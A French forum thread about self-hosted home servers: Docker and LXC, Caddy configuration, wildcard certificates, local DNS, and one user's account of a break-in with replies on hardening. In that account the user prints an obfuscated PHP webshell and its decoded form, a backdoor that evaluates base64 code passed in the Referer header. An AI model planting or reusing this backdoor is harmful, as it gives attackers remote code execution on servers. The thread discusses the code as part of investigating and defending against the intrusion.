Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1760 connectés 

 


Parlons réseau, vous êtes plutôt?




Attention si vous cliquez sur "voir les résultats" vous ne pourrez plus voter

 Mot :   Pseudo :  
  Aller à la page :
 
 Page :   1  2  3  4  5  ..  1600  1601  1602  ..  1717  1718  1719  1720  1721  1722
Auteur Sujet :

-> Topic Serveurs@home

n°1014383
x1fr
Posté le 03-03-2018 à 20:20:08  profilanswer
 

Reprise du message précédent :

Andorria a écrit :

 

Et docker il tourne sur ? :o

 

Oui bien sûr, j'ai oublié le plus important  :whistle:


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
mood
Publicité
Posté le 03-03-2018 à 20:20:08  profilanswer
 

n°1015144
lebibi
Notre torture c'est la tourtel
Posté le 08-03-2018 à 18:08:14  profilanswer
 

Messij a écrit :

Je sors d'une infra quasi full docker avec images personnalisées hebergées sur un repo privé.
 
Avec gitlab qui heberge le code source et s'occupe de la gestion du cycle de vie des containers / update.
 
Après 1 an je migre la totalité des services d'infra (dns, reverse proxy, serveurs webs, bdd...) dans des containers lxc. Pour tout ce qui est gestion de services avec rétention de données, c'est un grand bonheur. Superbes perfs, sauvegarde et restauration en 1 clic, maintenance minime.
Docker n'est pas fait pour gerer les services critiques imo.
 
Les conteneurs / vm sont administrées par ansible.
Je garde docker pour les webapps non critiques mais je passe sur du 100% images publiques pour plus me faire chier à corriger les bugs suite aux maj des distro/services (c'est la communauté qui le fait a ma place :o)
 
Gitlab héberge toujours le code source et push les builds/déploiements de services sur lxc (best produit open source ever).
 
Landscape gere les majs des vm/containers.
 
Je vire nginx au profit de caddy. Un serveur http minimaliste qui fait des merveilles (il update son webroot tout seul après commit sur un repo surveillé par exemple).
 
 
 
Mon but c'est d'avoir une infra avec ~30 services à jour niveau produits et sécurité et d'avoir le minimum de maintenance à faire (merci /r/devops)
 
 
Edit, precision pour la partie web avec une ipv4.
1 reverse proxy couplé a certbot pour gestion des certificats (on aura bientot les wildcard, ca sort dans qqs semaines) qui redirige vers les serveurs webs http de chaque service.
 
Les services sont accessibles via https://service.nomdomaine


 
Je ne connaissais pas caddy, ça m'a l'air bien sympa coupler dans du docker par exemple.
LXC c'est du jail (FreeBSD) au final ?


Message édité par lebibi le 08-03-2018 à 18:16:06

---------------

n°1015181
XaTriX
Posté le 08-03-2018 à 21:17:34  profilanswer
 

C'est similaire oui

 

XaT


---------------
"Xat le punk à chien facho raciste. C'est complexe comme personnage." caudacien 05/10/2020
n°1016174
x1fr
Posté le 15-03-2018 à 10:34:07  profilanswer
 

Let's Encrypt supporte désormais les wildcards :love:
 
https://community.letsencrypt.org/t [...] ards/55578


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1016286
Iryngael
Awesome, ain't it ?
Posté le 15-03-2018 à 21:41:15  profilanswer
 
n°1016292
dd_pak
Posté le 15-03-2018 à 22:25:57  profilanswer
 

Je suis pas calé sur les certificats, quelqu'un peut me dire à quoi ça sert un certificat wildcards ?

n°1016293
dd_pak
Posté le 15-03-2018 à 22:32:25  profilanswer
 

Messij a écrit :

Je sors d'une infra quasi full docker avec images personnalisées hebergées sur un repo privé.
 
Avec gitlab qui heberge le code source et s'occupe de la gestion du cycle de vie des containers / update.
 
Après 1 an je migre la totalité des services d'infra (dns, reverse proxy, serveurs webs, bdd...) dans des containers lxc. Pour tout ce qui est gestion de services avec rétention de données, c'est un grand bonheur. Superbes perfs, sauvegarde et restauration en 1 clic, maintenance minime.
Docker n'est pas fait pour gerer les services critiques imo.
 
Les conteneurs / vm sont administrées par ansible.
Je garde docker pour les webapps non critiques mais je passe sur du 100% images publiques pour plus me faire chier à corriger les bugs suite aux maj des distro/services (c'est la communauté qui le fait a ma place :o)
 
Gitlab héberge toujours le code source et push les builds/déploiements de services sur lxc (best produit open source ever).
 
Landscape gere les majs des vm/containers.
 
Je vire nginx au profit de caddy. Un serveur http minimaliste qui fait des merveilles (il update son webroot tout seul après commit sur un repo surveillé par exemple).
 
 
 
Mon but c'est d'avoir une infra avec ~30 services à jour niveau produits et sécurité et d'avoir le minimum de maintenance à faire (merci /r/devops)
 
 
Edit, precision pour la partie web avec une ipv4.
1 reverse proxy couplé a certbot pour gestion des certificats (on aura bientot les wildcard, ca sort dans qqs semaines) qui redirige vers les serveurs webs http de chaque service.
 
Les services sont accessibles via https://service.nomdomaine


 
Tu es full ubuntu ? (pour landscape)
Tu peux expliquer un peu plus le fonctionnement de Caddy ? j'ai du mal à comprendre le plus...
 
Sinon belle infra  :sol:  

n°1016294
x1fr
Posté le 15-03-2018 à 22:58:49  profilanswer
 

dd_pak a écrit :

Je suis pas calé sur les certificats, quelqu'un peut me dire à quoi ça sert un certificat wildcards ?


 
Jusqu'à présent il fallait faire des demandes pour des domaines précis (par exemple www.mondomaine.com), les wildcards permettent de faire un certificat pour *.mondomaine.com, ce qui fait que sans changer de certif, tu peux très bien l'utiliser pour www.mondomaine.com ou truc.mondomaine.com


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1016296
dd_pak
Posté le 15-03-2018 à 23:15:17  profilanswer
 

Je comprends bien le principe, mais avec Caddy ou (Traefik pour mon cas), la génération des certificats est automatique, donc ça change rien au quotidien.

n°1016299
XaTriX
Posté le 15-03-2018 à 23:54:41  profilanswer
 

Messij a écrit :

Je sors d'une infra quasi full docker avec images personnalisées hebergées sur un repo privé.
 
Avec gitlab qui heberge le code source et s'occupe de la gestion du cycle de vie des containers / update.
 
Après 1 an je migre la totalité des services d'infra (dns, reverse proxy, serveurs webs, bdd...) dans des containers lxc. Pour tout ce qui est gestion de services avec rétention de données, c'est un grand bonheur. Superbes perfs, sauvegarde et restauration en 1 clic, maintenance minime.
Docker n'est pas fait pour gerer les services critiques imo.
 
Les conteneurs / vm sont administrées par ansible.
Je garde docker pour les webapps non critiques mais je passe sur du 100% images publiques pour plus me faire chier à corriger les bugs suite aux maj des distro/services (c'est la communauté qui le fait a ma place :o)
 
Gitlab héberge toujours le code source et push les builds/déploiements de services sur lxc (best produit open source ever).
 
Landscape gere les majs des vm/containers.
 
Je vire nginx au profit de caddy. Un serveur http minimaliste qui fait des merveilles (il update son webroot tout seul après commit sur un repo surveillé par exemple).
 
 
 
Mon but c'est d'avoir une infra avec ~30 services à jour niveau produits et sécurité et d'avoir le minimum de maintenance à faire (merci /r/devops)
 
 
Edit, precision pour la partie web avec une ipv4.
1 reverse proxy couplé a certbot pour gestion des certificats (on aura bientot les wildcard, ca sort dans qqs semaines) qui redirige vers les serveurs webs http de chaque service.
 
Les services sont accessibles via https://service.nomdomaine


Tu utilises AWX/Tower pour ansible ?
 
XaT


---------------
"Xat le punk à chien facho raciste. C'est complexe comme personnage." caudacien 05/10/2020
mood
Publicité
Posté le 15-03-2018 à 23:54:41  profilanswer
 

n°1016300
x1fr
Posté le 16-03-2018 à 00:12:20  profilanswer
 

dd_pak a écrit :

Je comprends bien le principe, mais avec Caddy ou (Traefik pour mon cas), la génération des certificats est automatique, donc ça change rien au quotidien.


 
On n'a pas dit que c'était utile à tout le monde  [:cosmoschtroumpf]


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1016309
dd_pak
Posté le 16-03-2018 à 08:25:03  profilanswer
 

x1fr a écrit :


 
On n'a pas dit que c'était utile à tout le monde  [:cosmoschtroumpf]


 
Je sais mais tu as un exemple d’utilisation ?
Merci pour les réponses  :jap:

n°1016312
x1fr
Posté le 16-03-2018 à 08:48:10  profilanswer
 

Chez moi quand je démarre un container docker j'ai la possibilité de lui mettre une option "-e VIRTUAL_HOST=xxxx.mondomaine.com"
Ce qui déclenche automatiquement la création d'un vhost sur nginx avec reverse proxy, etc...
 
Du coup quand je démarre un container sur un nouveau sous-domaine, soit il faut que je mette à jour mon certificat en ajoutant manuellement le sous domaine à la liste, soit j'ai la flemme et j'ai un message d'alerte quand j'arrive sur la page en https. (Sur le dns du domaine -chez ovh, j'ai déjà un wildcard de configuré, donc rien à faire de ce côté là)
 
Maintenant je vais pouvoir faire un certificat avec wildcards et pouvoir faire ce que je veux avec les sous-domaine sans me soucier du dns ou des certif.


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1016350
dd_pak
Posté le 16-03-2018 à 13:45:49  profilanswer
 

Merci :)  
Je savais pas que l'on pouvais faire ça aussi pour le dns  :love:

n°1017011
Messij
Posté le 20-03-2018 à 22:42:22  profilanswer
 

dd_pak a écrit :


 
Tu es full ubuntu ? (pour landscape)
Tu peux expliquer un peu plus le fonctionnement de Caddy ? j'ai du mal à comprendre le plus...
 
Sinon belle infra  :sol:  


Thanks. Full Ubuntu yes, ça permet d'avoir des repo à jour pour 99.9% des produits qu'on cherche à installer.
 
Caddy c'est juste un webserver codé en GO (donc très léger et avec une empreinte système minimale), à la base fait pour des développeurs qui veulent pas se prendre la tête avec une configuration poussée.
 
Tu lances l'exécutable avec un fichier de conf qui décrit ton / tes sites webs et c'est parti.
 
Le fichier de conf est minimaliste, y'a très peu de choses qui doivent être renseignées.
Voici la description d'un site que j'héberge :
 

Code :
  1. :8080 {
  2.     root /var/www/homepage
  3.     log /var/log/caddy/homepage.log
  4.     gzip
  5.     tls off
  6.     git {
  7.         repo https://gitlab/WebApps/homepage.git
  8.         clone_args -c http.sslVerify=false
  9.         interval -1
  10.         hook /webhook homepage_publish
  11.         branch "master"
  12.         }
  13.     }


 
Avec ces 10 lignes j'ai un site complet qui s'update tout seul et que je n'ai pas à maintenir.
Caddy support pas mal de directives HTTP standard et on peut ajouter des modules développés par la communauté très facilement (communication avec fournisseurs dns, gestion de l'authentification, api pour monitoring prometheus, etc)
Comparé à un traefik que tu connais, la marge d'apprentissage est bcp plus faible, et il permet plus de modularité. Mais c'est pas exactement le même type de produit en même temps)
 
En conclusion je dirais que l'intérêt de Caddy c'est de faire ce que tu veux en peu de lignes de codes et sans passer 10h à fouiller le net pour répondre à ton besoin.
 

XaTriX a écrit :


Tu utilises AWX/Tower pour ansible ?
 
XaT


 
Je suis en train de tester en ce moment, ça m'a l'air génial pour centraliser / planifier les exécutions sans se coltiner des produits tiers complexes.
Si on est déjà à l'aise avec ansible, la courbe de progression avec AWX a l'air nulle pour l'instant. Tu l'utilises en perso / boulot ?  [:canaille]  


---------------
WOW chien beaucoup
n°1017084
dd_pak
Posté le 21-03-2018 à 10:57:38  profilanswer
 

Merci pour ce retour.  
Je vais tester Caddy, la synchronisation avec un dépôt GIT m'intéresse :) je vais voir si je peux adapter ça avec un de nos projets.

n°1017312
_pollux_
Pan ! t'es mort
Posté le 22-03-2018 à 10:54:30  profilanswer
 

Salut,

 

Je sais pas trop où poser ma question, alors je la pose ici.
Je viens récemment de faire l'acquisition d'un nom de domaine, pour faciliter mes échanges avec mon serveur@home (un nas syno, c'est moche, mais ça me suffit :D ) sur fibre orange, donc sans ip fixe.

 

Je m'en sers surtout pour du caldav, carddarv, partage audio.

 

Ca fonctionne très bien avec mes différent appareils (tel et tablette android / appli web) en utilisant la redirection de mon nom de domaine si je suis hors de chez moi.

 

Par contre, si je suis connecté en local... ça foire, la résolution du ndd ne fonctionne pas a priori.

 

Il y at-il moyen de corriger ça ?

 

Message cité 1 fois
Message édité par _pollux_ le 22-03-2018 à 10:55:04

---------------
Le topic du sport électronique@hfr : watch the l33t !
n°1017313
x1fr
Posté le 22-03-2018 à 11:00:00  profilanswer
 

Soit en bidouillant ton fichier hosts (sur chaque poste), soit en aillant la main sur le serveur DNS local (ce qui n'est pas le cas il me semble avec la box orange), soit en changeant de box pour un routeur qui gère le loopback :D


---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1017314
raukoras
Posté le 22-03-2018 à 11:03:34  profilanswer
 

_pollux_ a écrit :

Salut,  
 
Je sais pas trop où poser ma question, alors je la pose ici.
Je viens récemment de faire l'acquisition d'un nom de domaine, pour faciliter mes échanges avec mon serveur@home (un nas syno, c'est moche, mais ça me suffit :D ) sur fibre orange, donc sans ip fixe.
 
Je m'en sers surtout pour du caldav, carddarv, partage audio.
 
Ca fonctionne très bien avec mes différent appareils (tel et tablette android / appli web) en utilisant la redirection de mon nom de domaine si je suis hors de chez moi.
 
Par contre, si je suis connecté en local... ça foire, la résolution du ndd ne fonctionne pas a priori.
 
Il y at-il moyen de corriger ça ?
 


Unbound (S.tephane Bor.tzmeyer a un tuto bien fait dessus).
 
Le soucis est de contourner ta box, donc soit tu paramètres les DNS à la main sur tous les appareils, soit tu installes un serveur dhcp et un point d'accès (pointant vers le serveur dhcp, qui lui même pointe vers ton serveur DNS).

n°1017316
_pollux_
Pan ! t'es mort
Posté le 22-03-2018 à 11:08:12  profilanswer
 

ok, merci pour ces pistes :jap:

 

ça n'a pas l'air simple :D sachant que bidouiller les fichiers hosts sur un appareil android, je sais pas faire :D et que ça me fais chier de devoir foutre un routeur/serveur dhcp en plus juste pour ça :/

Message cité 1 fois
Message édité par _pollux_ le 22-03-2018 à 11:13:25

---------------
Le topic du sport électronique@hfr : watch the l33t !
n°1017317
x1fr
Posté le 22-03-2018 à 11:11:12  profilanswer
 

Oui, et du coup ça voudrait dire que l'appareil ne pourrait pas non plus y accéder quand tu es en dehors du réseau local (vu qu'il essaierai d'y accéder avec l'adresse locale).

 

Dans ce cas avoir ton propre serveur DNS local me parait la meilleure solution


Message édité par x1fr le 22-03-2018 à 11:12:01

---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1017318
raukoras
Posté le 22-03-2018 à 11:11:14  profilanswer
 

_pollux_ a écrit :

ok, merci pour ces pistes :jap:
 
ça n'a pas l'air simple :D sachant que bidouiller les fichiers hosts sur un appareil android, je sais pas faire :D


Sisi, c'est super facile.
 
Pour modifier les DNS sous Android, le plus simple est de configurer le réseau WiFi directement, en cliquant dessus on peut modifier les DNS.
 
Mais il faut le faire pour chaque appareil.
 
Installer un serveur DHCP, ça se fait en 15 minutes avec un Raspberry.

n°1017322
_pollux_
Pan ! t'es mort
Posté le 22-03-2018 à 11:19:31  profilanswer
 

Ok, le mieux est donc effectivement un serveur DNS local (p'tre sur un raspberry). Faut que je m'en procure un :D
 
Et que je passe en 4G sur mon tel en attendant :D
 
Merci en tout cas pour votre aide :jap:


---------------
Le topic du sport électronique@hfr : watch the l33t !
n°1017323
lestat67se​l
:-)
Posté le 22-03-2018 à 11:29:47  profilanswer
 

Y a pas de service DNS disponible sur le Syno ?
 
Perso c'est DNS interne, et la Freebox distribue l'IP du DNS interne via le DHCP > pas besoin de bidouiller sur chaque appareil.
Le DNS interne connait uniquement les quelques adresse fixe de mon lan local, puis forward tout le reste sur un DNS externe.

n°1017324
_pollux_
Pan ! t'es mort
Posté le 22-03-2018 à 11:32:01  profilanswer
 

A priori, si... il y a bien un service de serveur dns sur le syno...faut que je regarde ça de plus près.


---------------
Le topic du sport électronique@hfr : watch the l33t !
n°1017325
x1fr
Posté le 22-03-2018 à 11:36:53  profilanswer
 

lestat67sel a écrit :

Y a pas de service DNS disponible sur le Syno ?

 

Perso c'est DNS interne, et la Freebox distribue l'IP du DNS interne via le DHCP > pas besoin de bidouiller sur chaque appareil.
Le DNS interne connait uniquement les quelques adresse fixe de mon lan local, puis forward tout le reste sur un DNS externe.

 

Dans l'absolu, la freebox gère le loopback si je me souviens bien, donc même en utilisant le dns général du nom de domaine (qui pointe vers l'ip publique de ta freebox), un poste local devrait être en mesure de joindre le serveur derrière. Mais pas avec une livebox.

 

L'avantage de cette solution, c'est que le jour où on change de FAI, rien à toucher :)
A la maison j'ai remplacé les box par un pfsense. Le jour où je change de FAI, je n'ai que la partie connexion WAN à reconfigurer sur pfsense. Tout le reste (services accessible de l'extérieur et reseau local) ne bouge pas. Déjà vécu pour un passage de free à bouygues, aucun soucis.


Message édité par x1fr le 22-03-2018 à 11:39:45

---------------
Origin / PSN / Steam / Uplay : x1fr - bnet : Fab#2717
n°1017328
raukoras
Posté le 22-03-2018 à 11:46:44  profilanswer
 

lestat67sel a écrit :

Y a pas de service DNS disponible sur le Syno ?
 
Perso c'est DNS interne, et la Freebox distribue l'IP du DNS interne via le DHCP > pas besoin de bidouiller sur chaque appareil.
Le DNS interne connait uniquement les quelques adresse fixe de mon lan local, puis forward tout le reste sur un DNS externe.


 

_pollux_ a écrit :

A priori, si... il y a bien un service de serveur dns sur le syno...faut que je regarde ça de plus près.


Je l'avais testé à un moment.
J'ai abandonné l'idée direct, en raison du délai de réponse si le système est en veille.
 
Autant une synchro de photos je me moque de mettre 5 secondes à me connecter au Syno, autant ma première requête DNS j'en ai pas envie.
 
Mais sinon oui, c'est fonctionnel.

n°1017329
_pollux_
Pan ! t'es mort
Posté le 22-03-2018 à 11:50:33  profilanswer
 

Ah oui, effectivement, j'avais pas pensé à ça :D

 

Je vais rester tel quel pour le moment... et si je trouve le temps, je verrai si je peux faire ça sur un raspberry qui n'aurait pas de veille.


Message édité par _pollux_ le 22-03-2018 à 11:57:09

---------------
Le topic du sport électronique@hfr : watch the l33t !
n°1017333
dd_pak
Posté le 22-03-2018 à 12:20:49  profilanswer
 

Sinon je crois que la dernière box orange gère le loopback, à vérifier...

n°1017339
XaTriX
Posté le 22-03-2018 à 12:35:20  profilanswer
 

Une petite recherche montre que la lb4 supporterai le loopback

 

XaT


---------------
"Xat le punk à chien facho raciste. C'est complexe comme personnage." caudacien 05/10/2020
n°1017428
Profil sup​primé
Posté le 23-03-2018 à 08:47:47  answer
 

Pareil, DNS perso avec ses propres règles (domaines publicitaire, FB, etc "bloqués" ) et ndd locaux pour plus de confort :).


Message édité par Profil supprimé le 23-03-2018 à 08:48:01
n°1018284
depart
Posté le 30-03-2018 à 16:59:25  profilanswer
 

J'ai besoin de conseils...
Tout à l'heure, en balade sur le disque de mon serveur perso sous windows 2012 je constate que mon espace disque à diminué fortement... je regarde d'où ça via via un treesize... et WTF : un nouveau compte utilisateur a été créé (nommé WAMPserver lol), visiblement un mec s'est logué, a installé Firefox et a téléchargé des iso de jeux pas très légaux !!! A priori un allemand, ça ne ressemble pas trop à un script auto mais à des actions lancées manuellement... étrange.
 
J'ai dégagé le compte et fait le ménage, mais maintenant vient l'heure des questions :
- comment ce truc a t'il été possible ? probablement via RDP mais quand même ? (l'admin a un mot de passe à 12 caractères random, j'ai un compte plus faible [pass a 8 chars] mais avec un username compliqué pas bateau).
 
Mon serveur a des ouvertures vers l'extérieur : ftp, http, https, rdp... et forcément ça en fait une victime toute désignée. Quel serait selon vous le meilleur moyen de le protéger ? Il est derrière une livebox et pour l'instant il y a un NAT direct des ports 21/80/443/3389 vers cette machine.
 
- J'ai besoin de l'accès RDP depuis une ip variable (smartphone en 4G par ex, en wifi en vadrouille chez des amis...) donc je vois 2 solutions :
1/ trouver un moyen de limiter géographiquement les ip autorisées (genre limiter à la France déjà)
2/ mettre en place un VPN, mais là je manque de compétences, des suggestions ?
 
Même chose pour le http (WAMP) : pour certains services j'ai besoin d'un accès direct via le port 80, mais je pourrai en rendre certains moins ouverts, par exemple les ouvrir/fermer ponctuellement, limiter les ips à la France... mais là encore dur de tout verrouiller.
Exemple d'usage courant :
- petite page html récap de ma domotique. Pratique pour savoir si tout va bien lorsque je ne suis pas chez moi (sans avoir à lancer une artillerie lourde).
- site web en cours de développement, interactions avec mes clients (genre "allez voir à votresiteencours.amamaison.com et dites-moi ce que vous en pensez" ). Je ne peux pas leur demander un accès via un VPN, ni leur demander avec quelle ip ils consulteront.
 
Bref, je suis preneur de suggestions (ou tutos) pour verrouiller un peu tout ça. Pour info le serveur c'est un petit Atom J1900 [cpumark 1862] et 8Go de ram, pas de quoi faire tourner plein de VM et whatmille bordels.
 
Big merci par avance.


Message édité par depart le 30-03-2018 à 17:13:06
n°1018285
Je@nb
Modérateur
Kindly give dime
Posté le 30-03-2018 à 17:09:40  profilanswer
 

bah vu que c'est sous le profile de ton wamp j'aurai tendance àd ire qu'il est passé par là. Tes sites web doivent être pourris et permettre de rentrer ou ta domotique

n°1018286
depart
Posté le 30-03-2018 à 17:10:50  profilanswer
 

Je@nb a écrit :

bah vu que c'est sous le profile de ton wamp j'aurai tendance àd ire qu'il est passé par là. Tes sites web doivent être pourris et permettre de rentrer ou ta domotique


wamp ne tourne pas sous un compte dédié.
c'est juste le nom du compte créé. Mais j'ai un gros doute qu'il y ait un lien entre les deux, probablement un nom pour passer inaperçu...
Après ça peut être une faille d'un site/morceau de site, machin php quelconque ça c'est sûr.


Message édité par depart le 30-03-2018 à 17:11:43
n°1018287
raukoras
Posté le 30-03-2018 à 17:20:36  profilanswer
 

À tout hasard, Drupal ?

n°1018288
depart
Posté le 30-03-2018 à 17:25:10  profilanswer
 

raukoras a écrit :

À tout hasard, Drupal ?


nope.
Par contre du wordpress en quantité, modx (une antiquité), dotclear, des devs perso, ... tout ça derrière des sous domaines (qu'il faut connaitre ou aller récupérer auprès de la config complète du nom de domaine).
 
J'ai fait un scan avast, il m'a trouvé 3/4 fichiers php (créés de toute pièces à priori), pour divers sites, mais avec des dates diverses et un contenu obfusqué genre :
 
$func="cr"."eat"."e_fun"."cti"."on";$b374k=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$b37....
Après désobfuscation ça donne :
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
    echo '<3456>';
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
    echo '</3456>';
}
Donc en effet ça permet d'intégrer n'importe quoi :(
 
 
Juste avant l'heure de la création du compte Windows, dans les logs http j'ai un appel à un de ces fichiers (ss.php)  
 
Hum... possible idée d'où les fichiers viennent, j'ai testé quelques plugins/thèmes  wordpress dont je ne suis pas forcément sûr de l'origine... (téléchargés hors espace officiel)
par contre c'est bizarre que j'ai des fichiers à la racine de différents sites... (ce qui peut laisser malgré tout penser à un pb avec Wamp...)
 
Bon reste quand même la problématique de comment verrouiller un peu plus tout ça ?


Message édité par depart le 30-03-2018 à 18:02:50
n°1018426
Profil sup​primé
Posté le 31-03-2018 à 16:07:52  answer
 

Déjà la base du bon sens c'est de passer via un VPN pour la prise de contrôle via ssh ou rdp :)

 

Ensuite, je ne connais pas wamp, c'est une sorte de apache/php/db cléf en main ? Si c'est ça oublie, passe soit sur iis ou mieux un linux avec apache et les mod qui vont bien ;)

 

Je te conseille également un truc tout con mais diablement efficace si tu as sur ton serveur web des sites en dev, donc potentiellement faillibles, c'est de passer via un autre port de sortie que le 80 pour éviter les scans automatique. Par exemple, tu donnes comme ip à ton client, site.serveur.com:99 (au pire si t'as un domaine avec un hébergement en datacenter, une iframe et roulaiz). le but est que ton serveur ne réponde pas aux scans auto sur le port 80.

 

Je conseille toujours de réduire au max la surface d'attaque, avoir 8000 ports et services ouverts alors qu'on peut en avoir un ou deux d'ouvert en passant via un VPN, c'est prendre des risques pour rien ;)

Message cité 2 fois
Message édité par Profil supprimé le 31-03-2018 à 16:09:43
n°1018432
arkrom
note, ca passait c'etait beau
Posté le 31-03-2018 à 16:20:26  profilanswer
 


WAMP cest un acronyme pour
Windows
Apache
MySQL
Php

 

c'est un paquet intégré avec les outils de bases pour la gestion.
Mais il fait rien de plus que chaque éléments géré séparément


---------------
I sit, in my desolate room, no lights, no music, Just anger, I've killed everyone, I'm away forever, but I'm feeling better,How do I feel,What do I say,Fuck you, it all goes away,
n°1018433
Profil sup​primé
Posté le 31-03-2018 à 16:22:34  answer
 

Ok, merci ;)
 
Sinon, pourquoi apache sous windows et pas iis ?
Si c'est pour avoir apache, un debian est plus indiquée non ?

n°1018435
arkrom
note, ca passait c'etait beau
Posté le 31-03-2018 à 16:29:40  profilanswer
 

Sous debian t'as le petit frère LAMP (linux apache etc )  :sol:


---------------
I sit, in my desolate room, no lights, no music, Just anger, I've killed everyone, I'm away forever, but I'm feeling better,How do I feel,What do I say,Fuck you, it all goes away,
n°1018445
lebibi
Notre torture c'est la tourtel
Posté le 31-03-2018 à 17:12:34  profilanswer
 


 
Htaccess pour les sites de dev avec restriction par IP et/ou login/password.


---------------

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2  3  4  5  ..  1600  1601  1602  ..  1717  1718  1719  1720  1721  1722

Aller à :
Ajouter une réponse
 

Sujets relatifs
Avez-vous testé le Linksys Wag354G ? Topic officiel Wag354g[Topic R+] Free non-dégroupé
*** Configurer son Speed Touch Home pour Free Dégroupé[Topic R+] Orange --- adsl 2+ ---
[Topic R+] Orange --- adsl Max --- 
Plus de sujets relatifs à : -> Topic Serveurs@home


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR